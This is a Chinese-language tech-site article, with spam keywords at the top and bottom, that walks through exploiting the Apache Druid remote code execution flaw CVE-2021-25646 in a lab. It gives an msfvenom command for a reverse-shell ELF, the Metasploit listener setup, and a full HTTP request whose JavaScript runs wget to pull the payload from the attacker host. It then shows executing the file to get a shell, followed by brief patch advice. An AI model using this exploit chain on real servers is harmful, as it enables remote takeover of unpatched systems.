91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何利用Apache Druid 遠程代碼執行漏洞CVE-2021-25646上傳木馬程序

發布時間:2021-12-28 20:35:56 來源:億速云 閱讀:480 作者:柒染 欄目:安全技術

這篇文章給大家介紹如何利用Apache Druid 遠程代碼執行漏洞CVE-2021-25646上傳木馬程序,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。

一、?漏洞綜述

1.1 漏洞背景

Apache Druid 是用Java編寫的面向列的開源分布式數據存儲系統,旨在快速獲取大量事件數據,并在數據之上提供低延遲查詢。

近日Apache Druid官方發布了安全更新,修復遠程代碼執行漏洞(CVE-2021-25646)

1.2 漏洞描述

Apache Druid含有能夠執行嵌入在各種類型請求中由用戶提供的JavaScript代碼功能。此功能適用于高度信任環境,且默認情況下已禁用。但是,在Druid 0.20.0及更早版本中,經過身份驗證用戶可以構造傳入json串來控制某些參數發送惡意的請求,強制Druid為該請求運行用戶提供的JavaScript代碼。由于Apache Druid默認情況下缺乏授權認證,攻擊者可以利用此漏洞在目標機器上執行任意代碼,最終可獲取服務器的控制權限。

1.3使用MSF生成反彈shell木馬程序

本次使用的攻擊機地址為:192.168.159.131  靶機地址:192.168.159.139

1、使用MSF生成反彈shell的木馬程序,命令為:msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.159.131 LPORT=5555 -f elf > reverse.elf

備注:我這邊使用的靶機是64位系統,所以選擇的x64攻擊負載,32位系統可以選擇x86

如何利用Apache Druid 遠程代碼執行漏洞CVE-2021-25646上傳木馬程序

2、在攻擊機上使用python開啟web服務,下文將通過Apache Druid 遠程代碼執行漏洞執行wget命令,從剛搭建的web服務商下載msf生成的reverse.elf文件

如何利用Apache Druid 遠程代碼執行漏洞CVE-2021-25646上傳木馬程序

3、使用MSF開啟監聽模塊,命令為:

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set lhost 192.168.159.131

set lport 5555

run

如何利用Apache Druid 遠程代碼執行漏洞CVE-2021-25646上傳木馬程序

1.4漏洞復現

1、從https://github.com/apache/druid/releases/tag/druid-0.19.0下載Druid0.19版本,如下圖所示

如何利用Apache Druid 遠程代碼執行漏洞CVE-2021-25646上傳木馬程序

2、使用docker搭建Druid漏洞環境,解壓下載的文件,進入druid-druid-0.19.0/distribution/docker路徑使用docker-compose up –d搭建漏洞環境,完成之后訪問http://192.168.159.139:8888

如何利用Apache Druid 遠程代碼執行漏洞CVE-2021-25646上傳木馬程序

3、將下面的poc復制到burpsuit的repeater模塊,攻擊載荷中最終執行的命令為:wget http://192.168.159.131:888/reverse.elf,從搭建的web服務器上將反彈shell木馬程序下載到靶機上

POST /druid/indexer/v1/sampler HTTP/1.1

Host: 192.168.159.139:8888

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/json;charset=UTF-8

Content-Length: 931

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript",

"function": "function(value){return java.lang.Runtime.getRuntime().exec('wget http://192.168.159.131:888/reverse.elf')}",

"dimension": "added",

"": {

"enabled": "true"

}

}

}

},"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}

如何利用Apache Druid 遠程代碼執行漏洞CVE-2021-25646上傳木馬程序

4、將下載到靶機上的reverse.elf惡意程序賦予可執行權限,命令為:chmod a+x reverse.elf

如何利用Apache Druid 遠程代碼執行漏洞CVE-2021-25646上傳木馬程序

5、執行reverse.elf程序,執行命令為: ./reverse.elf

如何利用Apache Druid 遠程代碼執行漏洞CVE-2021-25646上傳木馬程序

6、msf成功收到反彈的shell

如何利用Apache Druid 遠程代碼執行漏洞CVE-2021-25646上傳木馬程序

二、影響范圍

Apache Druid <= 0.20.0

三、?嚴重等級

高危

四、?處置方法

4.1 官方補丁

Apache Druid 官方已在新版本中修復此漏洞,請升級至0.20.1及以上版本,下載鏈接:https://github.com/apache/druid/releases/tag/druid-0.20.1

4.2 臨時緩解措施

若暫時無法升級,可以通過以下方法臨時緩解影響:

設置網絡訪問控制策略,只允許可信任的內網IP訪問Druid。

引入druid-basic-security擴展添加授權認證。

關于如何利用Apache Druid 遠程代碼執行漏洞CVE-2021-25646上傳木馬程序就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

运城市| 邵东县| 哈巴河县| 长垣县| 许昌县| 九江县| 南乐县| 格尔木市| 浏阳市| 林西县| 韶关市| 武川县| 蕉岭县| 高雄市| 兖州市| 乡宁县| 宣汉县| 宜兰县| 陇南市| 柏乡县| 辛集市| 和龙市| 阿巴嘎旗| 东辽县| 福建省| 遵义县| 孝昌县| 山东省| 吴桥县| 广河县| 蕲春县| 黑山县| 永登县| 九龙县| 武平县| 文成县| 敦煌市| 绥中县| 玛多县| 乌拉特后旗| 措美县|